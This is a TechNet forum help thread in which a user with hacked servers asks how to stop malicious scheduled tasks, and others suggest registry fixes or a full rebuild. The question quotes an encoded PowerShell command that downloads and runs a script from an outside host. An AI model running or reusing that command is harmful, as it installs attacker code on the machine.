locked
Deleted schedule task are still running RRS feed

  • Question

  • My Server hacked by others. 

    there are some schedule taks run powershell command . I delete all of them. But those task still running. what should i do?

    here is the power shell command

    HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAHkANgBoAC4AbgBlAHQALwBnAD8AaAAxADkAMAAzADIAMQAnACkA

    ...

    Wednesday, April 3, 2019 5:55 AM

Answers

  • Hi,

    We could follow the steps to rebuild the task scheduler(it will delete your tasks):

    1. Type regedit in search box and enter.

    2. Click file > export, type the file name and save it.

    3. Find HKLM\SOFTWARE\Microsoft\Windows NT\Current Version\Schedule key, and delete this key.

    4. Save change and exit the registry.

    5. Check if task schedule run normally.

    Best regards,
    Yilia


    Please remember to mark the replies as answers if they help.
    If you have feedback for TechNet Subscriber Support, contact tnmff@microsoft.com.


    Thursday, April 4, 2019 3:27 AM
  • 我自己解决了,我通过修改注册表把计划任务服务禁用了,然后重启,再删除HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache下的异常内容,然后回复计划任务自动启动。

    你说的删除整个目录实在是太伤人了,系统自带的一些计划任务都没有了。

    Yes, I resolved it my self.

    that powershell script download script from a website.the script will create some schedule tasks to run powershell script .although i deleted all schedule task .but those task still runing . I modify HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule\Start to 4 to disable schedule task service ,restart my server, clean HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache, recover HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule\Start to 2 to run schedule task service .

    those task deleted  stop running again.


    ...

    • Marked as answer by Chivas_Tan Wednesday, April 10, 2019 2:50 PM
    Wednesday, April 10, 2019 2:46 PM

All replies

  • Best solution for recovering a hacked server is to reformat the disk and reinstall the operating system and applications.  Recover any necessary data from a time period that you know is safe from the hack.  You might be seeing something that is amiss from the hack and be able to remove that.  But you do not know if there is something else lurking in the environment that you cannot see.  The only way to be sure is to rebuild your system.

    tim

    Wednesday, April 3, 2019 1:03 PM
  • Hi,

    We could follow the steps to rebuild the task scheduler(it will delete your tasks):

    1. Type regedit in search box and enter.

    2. Click file > export, type the file name and save it.

    3. Find HKLM\SOFTWARE\Microsoft\Windows NT\Current Version\Schedule key, and delete this key.

    4. Save change and exit the registry.

    5. Check if task schedule run normally.

    Best regards,
    Yilia


    Please remember to mark the replies as answers if they help.
    If you have feedback for TechNet Subscriber Support, contact tnmff@microsoft.com.


    Thursday, April 4, 2019 3:27 AM
  • That's horrible。 There are 40 + server hacked! and all of them are in production environment

    ...

    Thursday, April 4, 2019 7:20 AM
  • 大哥,中文可以么?

    你是说把整个注册表导出还是只导出哪一个项?


    ...

    Thursday, April 4, 2019 7:21 AM
  • 您好,

    可以的。

    这个导出注册表主要是将注册表备份一下,以防一会儿修改注册表导致不必要的错误,能够进行还原。

    可以只导出您接下来修改的注册表项。

    如何在 Windows 中备份和还原注册表:

    https://support.microsoft.com/zh-cn/help/322756/how-to-back-up-and-restore-the-registry-in-windows

    Best regards,

    Yilia


    Please remember to mark the replies as answers if they help.
    If you have feedback for TechNet Subscriber Support, contact tnmff@microsoft.com.

    Thursday, April 4, 2019 7:39 AM
  • Yes, it is horrible.  But no matter what the operating system, if you have been cracked/hacked, the only way to ensure a clean environment is rebuilding.  If you fix this one obvious thing, how do you know that the cracker/hacker has not left behind something else?  The only way to be sure, is to rebuild.  And you may have to rebuild in a separate environment because without knowledge of the type of crack/hack, that thing that is left may propagate itself to any new computer placed into the environment.

    tim

    Thursday, April 4, 2019 1:24 PM
  • Hi,

    Is there anything I can do for you?

    If you have any problems or concerns, please feel free to post here. 

    Best regards,

    Yilia



    Please remember to mark the replies as answers if they help.
    If you have feedback for TechNet Subscriber Support, contact tnmff@microsoft.com.


    Wednesday, April 10, 2019 2:04 AM
  • Please.  As a moderator you should know that this is an English language forum.  This is your third post in Chinese.

    tim

    Wednesday, April 10, 2019 1:36 PM
  • 我自己解决了,我通过修改注册表把计划任务服务禁用了,然后重启,再删除HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache下的异常内容,然后回复计划任务自动启动。

    你说的删除整个目录实在是太伤人了,系统自带的一些计划任务都没有了。

    Yes, I resolved it my self.

    that powershell script download script from a website.the script will create some schedule tasks to run powershell script .although i deleted all schedule task .but those task still runing . I modify HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule\Start to 4 to disable schedule task service ,restart my server, clean HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache, recover HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule\Start to 2 to run schedule task service .

    those task deleted  stop running again.


    ...

    • Marked as answer by Chivas_Tan Wednesday, April 10, 2019 2:50 PM
    Wednesday, April 10, 2019 2:46 PM
  • I know.

    I write my post in English first. I guess that guy yilia zhao is a Chinese , because his name look like Chinese name! so i write in Chinese to reply him.



    ...

    Wednesday, April 10, 2019 2:50 PM